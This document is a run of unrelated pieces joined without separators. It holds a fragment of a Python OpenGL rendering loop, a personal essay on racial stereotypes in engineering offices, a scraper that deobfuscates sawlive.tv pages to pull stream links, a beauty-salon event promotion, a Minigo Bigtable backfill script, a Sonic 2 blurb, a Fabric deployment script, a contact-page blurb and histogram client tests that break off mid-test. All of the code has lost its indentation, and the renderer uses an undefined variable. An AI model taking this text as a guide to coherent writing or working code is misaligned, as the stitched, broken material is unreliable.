RenderOption.RENDER_LIGHT_PROBE)
# done render light probe preprocess
return
else:
""" render normal scene """
self.scene_manager.ocean.simulateFFTWaves()
# render gbuffer & preprocess
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
self.render_gbuffer()
self.render_preprocess()
self.render_shadow()
# render solid
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
glFrontFace(GL_CCW)
glDepthMask(False)  # depth was already written by the depth pre-pass / G-buffer pass
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glClear(GL_COLOR_BUFFER_BIT)
self.render_solid()
# copy HDR Target
src_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
dst_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
dst_framebuffer.copy_framebuffer(src_framebuffer)
src_framebuffer.bind_framebuffer()
# set common projection matrix
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# render ocean
if self.scene_manager.ocean.is_render_ocean:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.scene_manager.ocean.render_ocean(atmosphere=self.scene_manager.atmosphere,
texture_scene=RenderTargets.HDR_TEMP,
texture_linear_depth=RenderTargets.LINEAR_DEPTH,
texture_probe=RenderTargets.LIGHT_PROBE_ATMOSPHERE,
texture_shadow=RenderTargets.COMPOSITE_SHADOWMAP)
# re-copy linear depth
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.ATMOSPHERE,
RenderTargets.ATMOSPHERE_INSCATTER)
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
RenderOption.RENDER_LIGHT_PROBE)
glEnable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(False)
# Composite Atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
self.set_blend_state(True, GL_FUNC_ADD, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
composite_atmosphere = self.resource_manager.get_material_instance("precomputed_atmosphere.composite_atmosphere")
composite_atmosphere.use_program()
above_the_cloud = self.scene_manager.atmosphere.cloud_altitude < main_camera.transform.get_pos()[1]
composite_atmosphere.bind_uniform_data("above_the_cloud", above_the_cloud)
composite_atmosphere.bind_uniform_data("inscatter_power", self.scene_manager.atmosphere.inscatter_power)
composite_atmosphere.bind_uniform_data("texture_atmosphere", RenderTargets.ATMOSPHERE)
composite_atmosphere.bind_uniform_data("texture_inscatter", RenderTargets.ATMOSPHERE_INSCATTER)
composite_atmosphere.bind_uniform_data("texture_linear_depth", RenderTargets.LINEAR_DEPTH)
self.postprocess.draw_elements()
# prepare translucent
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
# Translucent
self.render_translucent()
# render particle
if RenderOption.RENDER_EFFECT:
glDisable(GL_CULL_FACE)
glEnable(GL_BLEND)
self.render_effect()
glDisable(GL_BLEND)
glEnable(GL_CULL_FACE)
# render probe done
if RenderOption.RENDER_LIGHT_PROBE:
return
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
self.set_blend_state(False)
self.render_postprocess()
if RenderOption.RENDER_OBJECT_ID:
self.render_object_id()
self.render_selected_object()
# debug render target
if self.debug_texture is not None:
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_texture(self.debug_texture)
if RenderOption.RENDER_FONT:
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.render_log()
if RenderOption.RENDER_DEBUG_LINE and self.debug_texture is None:
# render world axis
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
self.render_axis()
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
self.debug_line_manager.render_spline(spline)
self.debug_line_manager.render_debug_lines()
if RenderOption.RENDER_GIZMO and self.debug_texture is None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
# render spline gizmo
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GIZMO,
self.scene_manager.spline_gizmo_render_infos,
self.render_color_material)
# render transform axis gizmo
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.GIZMO)
I started my professional career right after college, and I immediately recognized that in my industry of planning and engineering, African Americans were few and far between. In a city like Baltimore, where over 60% of the population is African American, I’d think we’d make up more than the handful of professionals I know. On average, I don’t think any of my jobs ever had more than a 15% rate of African Americans employed in the office.
Now, I was used to being the minority in high school and in college, so adjusting to the low numbers in the professional world wasn’t hard; the challenge was adjusting to the stereotypes many colleagues had of me. From white men speaking slang around me to black men making assumptions about my blackness because I was from the suburbs, the judgments were nonstop and came from all angles. I’ve been called aggressive and sensitive in the same conversation by the same person. I’ve been told by a white person that my VP didn’t feel comfortable around me because I was black. And yes, I’ve had people make fried chicken jokes around me and think it was okay because I was “different.” As different as I am, I feel like everyone treats me the same.
# -*- coding: utf-8 -*-
import re, urllib, urlparse
from liveresolver.modules import client,decryptionUtils
from liveresolver.modules import jsunpack
from liveresolver.modules.log_utils import log
def resolve(url):
try:
page = re.compile('//(.+?)/(?:embed|v)/([0-9a-zA-Z-_]+)').findall(url)[0]
page = 'http://%s/embed/%s' % (page[0], page[1])
try: referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except: referer = page
try: host = urlparse.parse_qs(urlparse.urlparse(url).query)['host'][0]
except: host = 'sawlive.tv'
headers={'User-Agent': client.agent(),'Host': host, 'Referer': referer, 'Connection': 'keep-alive'}
result = client.request(page, referer=referer)
result = decryptionUtils.doDemystify(result)
url = client.parseDOM(result, 'iframe', ret='src')[-1]
url = url.replace(' ', '').replace('+','')
var = re.compile(r'var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
# iteratively substitute the simple string variables back into the page source
for i in range(100):
for v in var: result = result.replace(" %s " % v[0], ' %s '%v[1])
var = re.compile(r'var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
for v in var:
if '+' in v[1]:
ss = v[1].rstrip('+').replace('"+','').split('+')
sg = v[1].rstrip('+').replace('"+','')
for s in ss:
sg = sg.replace(s, var_dict[s])
var_dict[v[0]]=sg.replace('+','')
for i in range(100):
for v in var_dict.keys(): url = url.replace("'%s'" % v, var_dict[v])
for v in var_dict.keys(): url = url.replace("(%s)" % v, "(%s)" % var_dict[v])
result = client.request(url, headers = headers)
result = decryptionUtils.doDemystify(result)
var = re.compile(r'var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
file = re.compile("'file'\s*(.+?)\)").findall(result)[0]
file = file.replace('\'','')
for v in var_dict.keys():
file = file.replace(v,var_dict[v])
file = file.replace('+','').replace(',','').strip()
log("Sawlive: Found file url: " + file)
try:
log("Sawlive: Finding m3u8 link.")
if not file.startswith('http'): raise Exception()
url = client.request(file, output='geturl')
if not '.m3u8' in url: raise Exception()
url += '|%s' % urllib.urlencode({'User-Agent': client.agent(), 'Referer': file})
log("Sawlive: Found m3u8 link: " + url)
return url
except:
log("Sawlive: m3u8 link not found, finding rtmp.")
pass
strm = re.compile("'streamer'.+?'(.+?)'").findall(result)[0]
swf = re.compile("SWFObject\('(.+?)'").findall(result)[0]
url = '%s playpath=%s swfUrl=%s pageUrl=%s live=1 timeout=60' % (strm, file, swf, url)
url = urllib.unquote(url)
log("Sawlive: rtmp link found: " + url)
return url
except Exception as e:
log("Sawlive exception:\n" + str(e))
log("Sawlive: Resolver failed. Returning...")
return
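# Illustrative usage (the URL shape is an assumption based on the regex above):
#   resolve('http://sawlive.tv/embed/somechannel?referer=http://example.com/')
# Returns an .m3u8 URL with encoded request headers appended, an rtmp
# connection string, or None on failure.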
Carche Salon was the perfect setting for the new beauty and healthy cocktails with Hyaluron presented by Riel's World on Nov 10, 2017. The guests enjoyed their beauty and healthy cocktails al fresco in Carche Salon's lounge.
The beauty cocktails with Hyaluron were presented by Riel's World, a leading worldwide lifestyle company, and offer many perks like wrinkle reduction and improved skin hydration and elasticity, among other benefits. Enjoy the gallery with the event highlights!
Riel's World is a multinational company that operates in many countries around the world, by the hands of a professional multinational team with expertise in every needed discipline.
Riel’s World specializes in a wide array of product lines while giving special focus to their main goal, delighting your senses. To that end they offer the highest-quality products available: exotic wines and Champagne, a healthy line of tea, coffee and nutritious products, home fragrances, and clothes & accessories.
Their goal is as big as it gets, aiming to be there in every happy moment around the world, celebrating diversity and joy as their main values.
Hair & Beauty Salon: Their location and venue are absolutely fabulous as you can clearly see in the images. decorated with impeccable taste, offering a welcoming atmosphere in a glamorous and discrete setting in the heart of Puerto Banús most stylish area.
They are very much up to date with the latest trends and listen to your needs. Far from the cliché of the hairdresser who does whatever he wants, the team at Carche has the expertise to provide you with a truly relaxing moment in a spirit of trust.
Carche is a highly recommendable Beauty and Health Salon for both men and women. Their staff is respectful, professional and inspired to deliver a tailored style that supports a philosophy of natural beauty enhancement in hair and body care.
#!/usr/bin/env python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Write Minigo eval_game records to Bigtable.
This is used to backfill eval games from before they were written by
cc-evaluator as part of https://github.com/tensorflow/minigo/pull/709
"""
import sys
sys.path.insert(0, '.')
import itertools
import multiprocessing
import os
import re
from collections import Counter
from absl import app, flags
from google.cloud import bigtable
from google.cloud.bigtable import row_filters
from tqdm import tqdm
from tensorflow import gfile
import sgf_wrapper
from bigtable_input import METADATA, TABLE_STATE
flags.DEFINE_string(
'sgf_glob', None,
'Glob for SGFs to backfill into eval_games bigtable.')
flags.mark_flags_as_required([
'sgf_glob', 'cbt_project', 'cbt_instance', 'cbt_table'
])
FLAGS = flags.FLAGS
# Constants
EVAL_PREFIX = 'e_{:0>10}'
EVAL_GAME_COUNTER = b'eval_game_counter'
SGF_FILENAME = b'sgf'
#### Common Filters
EVAL_COUNT_FILTER = row_filters.ColumnRangeFilter(
METADATA, EVAL_GAME_COUNTER, EVAL_GAME_COUNTER)
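# With identical inclusive start and end columns, this filter selects exactly
# the metadata:eval_game_counter cell.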
#### START ####
def grouper(iterable, n):
iterator = iter(iterable)
group = tuple(itertools.islice(iterator, n))
while group:
yield group
group = tuple(itertools.islice(iterator, n))
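# Example: the final group may be shorter than n --
#   list(grouper(range(5), 2)) == [(0, 1), (2, 3), (4,)]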
def latest_game_number(bt_table):
"""Return the number of the last game to be written."""
# TODO(amj): Update documentation on latest_game_number (last game or next game)?
table_state = bt_table.read_row(TABLE_STATE, filter_=EVAL_COUNT_FILTER)
if table_state is None:
return 0
value = table_state.cell_value(METADATA, EVAL_GAME_COUNTER)
# see bigtable_input.py cbt_intvalue(...)
return int.from_bytes(value, byteorder='big')
def read_existing_paths(bt_table):
"""Return the SGF filename for each existing eval record."""
rows = bt_table.read_rows(
filter_=row_filters.ColumnRangeFilter(
METADATA, SGF_FILENAME, SGF_FILENAME))
names = (row.cell_value(METADATA, SGF_FILENAME).decode() for row in rows)
processed = [os.path.splitext(os.path.basename(r))[0] for r in names]
return processed
def canonical_name(sgf_name):
"""Keep filename and some date folders"""
sgf_name = os.path.normpath(sgf_name)
assert sgf_name.endswith('.sgf'), sgf_name
# Strip off '.sgf'
sgf_name = sgf_name[:-4]
# Often eval is inside a folder with the run name.
# include from folder before /eval/ if part of path.
with_folder = re.search(r'/([^/]*/eval/.*)', sgf_name)
if with_folder:
return with_folder.group(1)
# Return the filename
return os.path.basename(sgf_name)
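# Illustrative example (hypothetical path):
#   canonical_name('gs://bucket/v17-run/eval/2019-01-01/game.sgf')
#   returns 'v17-run/eval/2019-01-01/game'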
def process_game(path):
with open(path) as f:
sgf_contents = f.read()
root_node = sgf_wrapper.get_sgf_root_node(sgf_contents)
assert root_node.properties['FF'] == ['4'], ("Bad game record", path)
result = root_node.properties['RE'][0]
assert result.lower()[0] in 'bw', result
assert result.lower()[1] == '+', result
black_won = result.lower()[0] == 'b'
length = 0
node = root_node.next
while node:
props = node.properties
length += 1 if props.get('B') or props.get('W') else 0
node = node.next
sgf_path = canonical_name(path)
return (
(b"black", root_node.properties['PB'][0]),
(b"white", root_node.properties['PW'][0]),
# All values are strings, "1" for true and "0" for false here
(b"black_won", '1' if black_won else '0'),
(b"white_won", '0' if black_won else '1'),
(b"result", result),
(b"length", str(length)),
(b"sgf", sgf_path),
(b"tag", ""),
(b"tool", "eval_sgf_to_cbt"),
)
def read_games(glob, existing_paths):
"""Read all SGFs that match glob
Parse each game and extract relevant metadata for eval games table.
"""
globbed = sorted(gfile.Glob(glob))
skipped = 0
to_parse = []
for sgf_name in tqdm(globbed):
assert sgf_name.lower().endswith('.sgf'), sgf_name
sgf_path = canonical_name(sgf_name)
sgf_filename = os.path.basename(sgf_path)
if sgf_path in existing_paths or sgf_filename in existing_paths:
skipped += 1
continue
to_parse.append(sgf_name)
game_data = []
with multiprocessing.Pool() as pool:
game_data = pool.map(process_game, tqdm(to_parse), 100)
print("Read {} SGFs, {} new, {} existing".format(
len(globbed), len(game_data), skipped))
return game_data
def write_eval_records(bt_table, game_data, last_game):
"""Write all eval_records to eval_table
In addition to writing new rows table_state must be updated in
row `table_state` columns `metadata:eval_game_counter`
Args:
bt_table: bigtable table to add rows to.
game_data: metadata pairs (column name, value) for each eval record.
last_game: last_game in metadata:table_state
"""
eval_num = last_game
# Each column counts as a mutation so max rows is ~10000
GAMES_PER_COMMIT = 2000
for games in grouper(tqdm(game_data), GAMES_PER_COMMIT):
assert bt_table.read_row(EVAL_PREFIX.format(eval_num)), "Previous row doesn't exist"
assert bt_table.read_row(EVAL_PREFIX.format(eval_num+1)) is None, "Row already exists"
rows = []
for i, metadata in enumerate(games):
eval_num += 1
row_name = EVAL_PREFIX.format(eval_num)
row = bt_table.row(row_name)
for column, value in metadata:
row.set_cell(METADATA, column, value)
rows.append(row)
# For each batch of games print a couple of the rows being added.
if i < 5 or i + 5 > len(games):
print("\t", i, row_name, metadata[6][1])
if eval_num == last_game + len(games):
test = input("Commit ('y'/'yes' required): ")
if test.lower() not in ('y', 'yes'):
break
# TODO(derek): Figure out how to condition on atomic counter update.
# Condition all updates on the current value of last_game
game_num_update = bt_table.row(TABLE_STATE)
game_num_update.set_cell(METADATA, EVAL_GAME_COUNTER, eval_num)
print(TABLE_STATE, eval_num)
response = bt_table.mutate_rows(rows)
# validate that all rows written successfully
any_bad = False
for i, status in enumerate(response):
if status.code != 0:
print("Row number {} failed to write {}".format(i, status))
any_bad = True
if any_bad:
break
game_num_update.commit()
def main(unusedargv):
"""All of the magic together."""
del unusedargv
bt_table = (bigtable
.Client(FLAGS.cbt_project, admin=True)
.instance(FLAGS.cbt_instance)
.table(FLAGS.cbt_table))
assert bt_table.exists(), "Table doesn't exist"
# Get current game counter, updates are conditioned on this matching.
last_game = latest_game_number(bt_table)
print("eval_game_counter:", last_game)
print()
# Get existing SGF paths so we avoid uploading duplicates
existing_paths = read_existing_paths(bt_table)
print("Found {} existing".format(len(existing_paths)))
if existing_paths:
duplicates = Counter(existing_paths)
existing_paths = set(existing_paths)
for k, v in duplicates.most_common():
if v == 1:
break
print("{}x{}".format(v, k))
print("\tmin:", min(existing_paths))
print("\tmax:", max(existing_paths))
print()
# Get all SGFs that match glob, skipping SGFs with existing records.
data = read_games(FLAGS.sgf_glob, existing_paths)
if data:
write_eval_records(bt_table, data, last_game)
if __name__ == "__main__":
app.run(main)
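# Illustrative invocation (script name and flag values are assumptions;
# sgf_glob, cbt_project, cbt_instance and cbt_table are the required flags):
#   python eval_sgf_to_cbt.py --sgf_glob='gs://bucket/**/eval/**/*.sgf' \
#       --cbt_project=my-project --cbt_instance=my-instance --cbt_table=eval_games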
Dr. Eggman (aka Dr. Robotnik) is back to continue his zealous search for the Chaos Emeralds needed to fuel his new Death Egg contraption. The evil doctor secretly follows Sonic to his vacation spot, Westside Island, and launches a full-scale attack, imprisoning all the helpless animals of the island and turning them into mindless worker drones.
Now Sonic must thwart the doctor’s plans at all costs. This time he isn’t alone, as a peculiar two-tailed fox named Miles Prower (aka Tails) decides to aid him in the battle. Together they must locate the Chaos Emeralds before Dr. Eggman does, and put an end to his diabolical scheme.
I don't understand why, after 20 years of praise, Sonic The Hedgehog 2 is suddenly drawing detractors.
In short, I personally love it!
Casino Street Zone music. Nuff said.
from fabric.api import run, cd, sudo, roles, runs_once, env
from fabric.contrib.files import first
# add a local_fab_settings.py file,
# so that you can access your servers
# but please, don't commit it to git.
try:
from local_fab_settings import *
except ImportError:
pass
env.venv_roots = ['/oknesset_web/oknesset/', '/oknesset_data/oknesset/']
env.project_dir = 'Open-Knesset'
env.ok_user = 'oknesset'
def _venv_root():
return first(*env.venv_roots)
def _project_root():
return _venv_root() + env.project_dir
def _activate():
return 'source ' + _venv_root() + 'bin/activate'
def virtualenv(command):
with cd(_project_root()):
sudo(_activate() + ' && ' + command, user=env.ok_user)
# web server stuff
def web_apache_cmd(cmd):
if cmd not in ['start', 'stop', 'restart']:
raise Exception('Unknown apache command %s' % cmd)
sudo('/etc/init.d/apache2 %s' % cmd)
def restart_oknesset():
sudo('supervisorctl restart oknesset')
def _update_commit():
with cd(_project_root()):
sudo(
'git log --pretty=format:"Code Commit: %H <br>Last Update: %cd" -n 1 > templates/last_build.txt',
user=env.ok_user)
def _chown(to_user, directory=env.project_dir):
sudo("chown -R %s %s" % (to_user, directory))
@roles('web')
def deploy_web(requirements=False):
web_apache_cmd('stop')
with cd(_venv_root()):
_chown(env.ok_user)
with cd(env.project_dir):
_git_pull()
if requirements:
_install_requirements()
virtualenv('./manage.py collectstatic --noinput')
_update_commit()
#_chown('www-data')
restart_oknesset()
web_apache_cmd('start')
# db server stuff - should only run once on master db!
@runs_once
def db_migrate_syncdb():
virtualenv('./manage.py migrate')
@roles('db')
def deploy_backend(migration=False, requirements=False):
with cd(_project_root()):
_git_pull()
if requirements:
_install_requirements()
if migration:
db_migrate_syncdb()
@roles('db_master')
def show_cron(as_user=env.ok_user):
sudo('crontab -l', user=as_user)
@roles('db')
def db_show_replication():
# works on both servers
run('ps -ef | grep postgres | grep -e receiver -e sender')
# memcache commands
@roles('web')
@runs_once
def mc_flushall():
#run('echo flush_all | telnet localhost 11211')
virtualenv(
"DJANGO_SETTINGS_MODULE='knesset.settings' " +
"python -c 'from django.core.cache import cache; cache.clear()'"
)
# commands for all servers
def _git_pull(repo='origin', branch='master', as_user=env.ok_user):
sudo("git pull %s %s" % (repo, branch), user=as_user)
def _install_requirements():
virtualenv(
'cd .. && pip install -r ' +
env.project_dir + '/requirements.txt && cd ' + _project_root())
@roles('all')
def all_upgrade_system():
sudo('apt-get update')
sudo('apt-get upgrade')
@roles('all')
def show_updates():
sudo('cat /var/lib/update-notifier/updates-available')
sudo('/usr/lib/update-notifier/update-motd-reboot-required')
@roles('all')
def all_run_cmd(cmd):
run(cmd)
@roles('all')
def all_sudo_cmd(cmd):
sudo(cmd)
def deploy_all(repo='origin', branch='master', install_requirements=False, use_migration=False, reset_memcache=False):
deploy_backend(requirements=install_requirements, migration=use_migration)
deploy_web(requirements=install_requirements)
if reset_memcache:
mc_flushall()
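# Illustrative Fabric 1.x invocations (host/role definitions are expected to
# come from local_fab_settings.py; the task names are the ones defined above):
#   fab deploy_all
#   fab deploy_web:requirements=True
#   fab all_run_cmd:'uptime'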
To ask us a question about our services, you can contact Tritech Ground Engineering Ltd. using the contact form below.
You can also write to us or send us a fax using the contact details provided, or of course please telephone us on 01204 675109. We aim to respond to all online enquiries, if appropriate, within 1 working day.
#pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
import pytest
from mock import MagicMock
import matplotlib.pyplot as plt
import numpy as np
from ..histogram_client import HistogramClient
from ..layer_artist import HistogramLayerArtist
from ...core.data_collection import DataCollection
from ...core.exceptions import IncompatibleDataException
from ...core.hub import Hub
from ...core.data import Data
from ...core.subset import RangeSubsetState
FIGURE = plt.figure()
plt.close('all')
class TestException(Exception):
pass
class TestHistogramClient(object):
def setup_method(self, method):
self.data = Data(x=[0, 0, 0, 1, 2, 3, 3, 10, 20],
y=[-1, -1, -1, -2, -2, -2, -3, -5, -10])
self.subset = self.data.new_subset()
self.collect = DataCollection(self.data)
self.client = HistogramClient(self.collect, FIGURE)
self.axes = self.client.axes
FIGURE.canvas.draw = MagicMock()
assert FIGURE.canvas.draw.call_count == 0
def draw_count(self):
return self.axes.figure.canvas.draw.call_count
def layer_drawn(self, layer):
return layer in self.client._artists and \
all(a.visible for a in self.client._artists[layer]) and \
all(len(a.artists) > 0 for a in self.client._artists[layer])
def layer_present(self, layer):
return layer in self.client._artists
def assert_autoscaled(self):
yra = self.client.axes.get_ylim()
datara = [99999, -99999]
for a in self.client._artists:
y = a.y
if a.y.size > 0:
datara[0] = min(datara[0], a.y.min())
datara[1] = max(datara[1], a.y.max())
np.testing.assert_array_almost_equal(yra[0], 0)
np.testing.assert_array_almost_equal(datara[1], yra[1])
def test_empty_on_creation(self):
assert self.data not in self.client._artists
def test_add_layer(self):
self.client.add_layer(self.data)
assert self.layer_present(self.data)
assert not self.layer_drawn(self.data)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_add_invalid_layer_raises(self):
self.collect.remove(self.data)
with pytest.raises(IncompatibleDataException) as exc:
self.client.add_layer(self.data)
def test_add_subset_auto_adds_data(self):
subset = self.data.new_subset()
self.client.add_layer(subset)
assert self.layer_present(self.data)
assert self.layer_present(subset)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_double_add_ignored(self):
self.client.add_layer(self.data)
art = self.client._artists[self.data]
self.client.add_layer(self.data)
assert self.client._artists[self.data] == art
def test_add_data_auto_adds_subsets(self):
s = self.data.new_subset()
self.client.add_layer(self.data)
assert self.layer_present(s)
def test_data_removal(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
assert not (self.layer_present(self.data))
def test_data_removal_removes_subsets(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
s = self.data.new_subset()
assert len(self.data.subsets) > 0
for subset in self.data.subsets:
assert not (self.layer_present(subset))
def test_layer_updates_on_data_add(self):
self.client.add_layer(self.data)
for s in self.data.subsets:
assert s in self.client._artists
def test_set_component_updates_component(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
self.client.set_component(comp)
assert self.client._component is comp
def test_set_component_redraws(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
ct0 = self.draw_count()
self.client.set_component(comp)
assert self.draw_count() > ct0
def test_remove_not_present_ignored(self):
self.client.remove_layer(self.data)
def test_set_visible_external_data(self):
self.client.set_layer_visible(None, False)
def test_get_visible_external_data(self):
assert not (self.client.is_layer_visible(None))
def test_set_visible(self):
self.client.add_layer(self.data)
self.client.set_layer_visible(self.data, False)
assert not (self.client.is_layer_visible(self.data))
def test_draw_histogram_one_layer(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_subset_hidden(self):
self.client.add_layer(self.data)
s = self.data.new_subset()
self.client.set_layer_visible(s, False)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_two_layers(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_update_property_set_triggers_redraw(self):
self.client.add_layer(self.data)
ct = self.draw_count()
self.client.normed ^= True
assert self.draw_count() > ct
@pytest.mark.parametrize(('prop'), ['normed', 'cumulative'])
def test_set_boolean_property(self, prop):
"""Boolean properties should sync with artists"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
setattr(self.client, prop, False)
for a in self.client._artists:
assert not getattr(a, prop)
setattr(self.client, prop, True)
for a in self.client._artists:
assert getattr(a, prop)
def test_set_nbins(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.nbins = 100
for a in self.client._artists[self.data]:
assert a.nbins == 100
assert a.x.size == 100 + 1
def test_autoscale(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.axes.set_ylim(0, .1)
self.client.autoscale = False
self.client.autoscale = True
self.assert_autoscaled()
def test_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = -12, 20
assert self.client.xlimits == (-12, 20)
for a in self.client._artists[self.data]:
assert a.lo == -12
assert a.hi == 20
def test_set_xlimits_out_of_data_range(self):
"""Setting xlimits outside of range shouldn't crash"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 100, 200
self.client.xlimits = -200, -100
def test_component_property(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
assert self.client.component is self.data.components[0]
def test_apply_roi(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 1
assert state.hi == 3
def test_apply_roi_xlog(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
self.client.xlog = True
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 10
assert state.hi == 1000
def test_xlimits_sticky_with_component(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 5, 6
self.client.set_component(self.data.components[1])
self.client.xlimits = 7, 8
self.client.set_component(self.data.components[0])
assert self.client.xlimits == (5, 6)
self.client.set_component(self.data.components[1])
assert self.client.xlimits == (7, 8)
def test_default_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
assert self.client.xlimits == (0, 20)
self.client.set_component(self.data.id['y'])
assert self.client.xlimits == (-10, -1)
def test_xlimit_single_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = (None, 5)
assert self.client.xlimits == (0, 5)
self.client.xlimits = (3, None)
assert self.client.xlimits == (3, 5)
def test_xlimit_reverse_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = 5, 3
assert self.client.xlimits == (3, 5)
def test_xlog_axes_labels(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlog = True
assert self.client.axes.get_xlabel() == 'Log x'
self.client.xlog = False
assert self.client.axes.get_xlabel() == 'x'
self.client.ylog = True
assert self.client.axes.get_ylabel() == 'N'
self.client.ylog = False
assert self.client.axes.get_ylabel() == 'N'
def test_xlog_snaps_limits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.axes.set_xlim((-1, 1))
self.client.xlog = True
assert self.client.axes.get_xlim() != (-1, 1)
def test_artist_clear_resets_arrays(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
for a in self.client._artists[self.data]:
assert a.get_data()[0].size > 0
a.clear()
assert a.get_data()[0].size == 0
class TestCommunication(object):

    def setup_method(self, method):
        self.data = Data(x=[1, 2, 3, 2, 2, 3, 1])
        figure = MagicMock()
        self.collect = DataCollection()
        self.client = HistogramClient(self.collect, figure)
        self.axes = self.client.axes
        self.hub = Hub()
        self.connect()

    def draw_count(self):
        return self.axes.figure.canvas.draw.call_count

    def connect(self):
        self.client.register_to_hub(self.hub)
        self.collect.register_to_hub(self.hub)

    def test_ignore_data_add_message(self):
        self.collect.append(self.data)
        assert not self.client.layer_present(self.data)

    def test_update_data_ignored_if_data_not_present(self):
        self.collect.append(self.data)
        ct0 = self.draw_count()
        self.data.style.color = 'blue'
